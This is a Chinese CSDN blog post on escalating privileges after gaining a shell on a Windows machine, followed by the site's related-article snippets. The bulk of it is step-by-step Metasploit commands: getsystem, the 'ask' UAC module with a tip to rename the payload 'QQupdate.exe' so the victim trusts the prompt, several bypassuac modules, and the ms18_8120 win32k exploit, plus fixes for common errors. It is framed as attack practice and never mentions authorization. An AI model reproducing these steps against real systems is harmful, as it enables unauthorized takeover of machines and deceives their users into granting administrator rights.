我的内网渗透-提权大法

已于 2023-06-13 00:24:07 修改
阅读量582 收藏 2
点赞数
文章标签: 数学建模
于 2023-06-13 00:18:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1825819493/article/details/131174285
版权

拿到shell之后乱码解决

chcp 65001
#将编码设置为UTF-8的编码

 出现这个提示就是切换成功,后面也是可以正常显示的

提权

方法一:

新版本的kali直接getsystem,可以提权成功(有时候可以,有时候不可以)

meterpreter > getsystem

提权成功

方法二:

利用uac(用户账户控制)进行提权。

用户账户控制在涉及管理员权限的时候会提示你是否要这么做,确定的话就是以管理员的身份去运行如果把他拉到从不通知,在涉及需要使用管理员权限的时候就会直接以管理员的身份去运行。

利用uac提权有两种情况

①关闭了通知。在这种情况下,就不需要目标主机进行确认,可以直接提权成功

②开启着通知(默认是开启的,除非手动关闭)。这种情况就需要目标主机去确认,才能进行提权成功。

use exploit/windows/local/ask 
#使用windows的ask模块进行提权
search uac
#或者直接搜寻uac模块,找到ask也可以

msf6 exploit(windows/local/ask) > options
#进入模块后直接options查看需要进行哪一些配置

msf6 exploit(windows/local/ask) > set session 1
#设置我们要进行提权的会话

msf6 exploit(windows/local/ask) > set lport 5555
#这边的端口设置是随意的,不用跟session 1的端口一致


msf6 exploit(windows/local/ask) > set filename QQupdate.exe
#设置在目标主机uac弹出的名字,可以更改成一些比较可信的名称
#这里有一个要特别注意的点是需要在修改的文件名后面加上exe,不然在kali中攻击过程没显示报错,但是在目标主机中是弹不出uac窗口的

unset filename(或者其他配置名字)
#进行设置重置

msf6 exploit(windows/local/ask) > set technique PSH
#将设置成windows处理程序,可信度更高(原本是exe)

meterpreter > getsystem
#在目标主机确认之后会重新进入meterpreter模块,然后就可以获取计算机的管理权限

提权所生成的文件在目标主机的 C:\Users\ADMINI~1\AppData\Local\Temp

方法三:

利用bypassuac进行提权。

bypassuac这个是属于内核漏洞,有打补丁的话是不一定能成功的。

这些模块不一定每一个都可以使用,有一些是你系统不存在漏洞,有一些是你系统打了补丁

search bypassuac
#寻找可以绕过uac的脚本模块

msf6 exploit(windows/local/bypassuac_eventvwr) > use 0
#选择使用的模块,或者直接跟上模块的名称

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > options
#查看一下使用模块的配置,一般只需要设置会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > set session 1
#设置要进行提权的会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > run
#直接运行等待结果

报错

1. payload的设置。

[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target。

如果存在这样的问题,那么就需要更改下payload,需要和你之前会话的payload配置保持相同。  

2.[-] Exploit aborted due to failure: no-target: Session and Target arch must match
如果存在这样的报错就是存在windows的位数问题,他后面显示是X86的,我们之前用的是x64的payload。
在用msfvenom生成木马的时候可以不加x64进行木马生成,默认就是生成32位的程序。这样子就不会存在这种报错,不过这样子生成的程序容易存在兼容性问题,在主机中可能会直接进行提示兼容性问题,或者停止程序的运行

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

方法四:

此方法适用于攻击服务器,windows主机很难实现

msf6 exploit(windows/local/bypassuac_eventvwr) > search ms18_8120_win
#查找漏洞

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > options
#查看一下要进行设置的配置

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > set session 1
#设置要使用的会话

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > run
#开始攻击

run -j 
#后台运行

jobs
#查看监听(是否建立了会话)

偷吃"游"的阿彪
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
linux ms08 067漏洞,MS08067攻击实验失败的原因是什么?
weixin_39921023的博客
05-19 2754
该楼层疑似违规已被系统折叠隐藏此楼查看此楼靶机:虚拟机win7 x64 专业版 nat络 IP:192.168.233.128(新安装)攻击机:虚拟机Kali Linux nat络 IP:192.168.233.129靶机与虚拟机双向ping通,nmap检测靶机445端口开放命令:use windows/smb/ms08_067_netapiset PAYLOAD windows/s...
渗透测试-工具
05-25
渗透测试,工具
渗透exp补丁对比工具,附带有udf,过狗功能
08-07
渗透exp补丁对比工具,附带有udf,过狗功能,带有win2003,2008,2012补丁以及可以利用的exp可以自己配置
Py4JJavaError: Job aborted due to stage failure: Task 2 in stage 1.0 failed 1 times, most recent fai
微信公众号(年更选手):数据闲逛人 | Github开源项目:数分/数挖study路线 https://github.com/jc-dian/python_data_analysis
06-16 1800
jupyter搭建spark环境遇到的bug
红队常用命令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-11 4673
原文链接。
msf:Known bug in WMI query, try migrating to another process
墨痕诉清风的博客
03-19 549
迁移到另一个进程再次尝试 sessions -i 1 getpid:查看当前注入的进程 ID ps:查看所有进程 migrate 1460:将注入进程迁移新的进程
cve-2019-0708 msf 执行报错解决
热门推荐
大哥一声吼
12-03 1万+
cve-2019-0708 msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually ,没有正确设置好参数 msf5 exploit(windows/rdp/cve_2...
doublepulsar msf 执行报错解决
大哥一声吼
12-03 8503
doublepulsar msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Disable the DefangedMode option if you have authorization to proceed. ,没有正确设置好参数 msf5 exploit(windows/smb/doublepulsar_rce) &g...
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户枚举漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 4870
使用Kali Linux Metasploit复现永恒之蓝
渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-渗透 -最终版.pdf
最新发布
04-08
ISC-渗透 -最终版
渗透测试-外链.pdf
05-04
渗透测试-外链.pdf
部分渗透文章
04-16
突破拿shell,及内渗透,个人研究与应用,Linux下的渗透,xss与社工,基本知识,实例
Logstash 日志搜集处理框架 安装配置
weixin_33978016的博客
09-08 177
0. 介绍 Logstash是一款轻量级的日志搜集处理框架,可以方便的把分散的、多样化的日志搜集起来,并进行自定义的处理,然后传输到指定的位置,比如某个服务器或者文件。 http://kibana.logstash.es/content/logstash/ 风来了.fox 1.下载和安装 下载地址 https://www.e...
Metasploit中Exploit模块check方法详述
07-27 6070
Exploit模块的check方法用来检测一台远程主机是否有漏洞能够被利用。check方法默认的实施仅返回check方法不被Exploit模块支持。当然,一个完整的代码能够从check方法返回如表6.5所示的信息。
2017-2018-2 20155315《络对抗技术》Exp2:后门原理与实践
weixin_30311605的博客
03-28 359
实验目的 学习建立一个后门连接。 教程 实验内容 使用netcat获取主机操作Shell,cron启动。 使用socat获取主机操作Shell, 任务计划启动。 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试。 ...
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3331
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在络中传输数据。对于内渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是络的一部分,因此可能不会被络安全设备视为可疑流量。然而,如果攻击者的络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值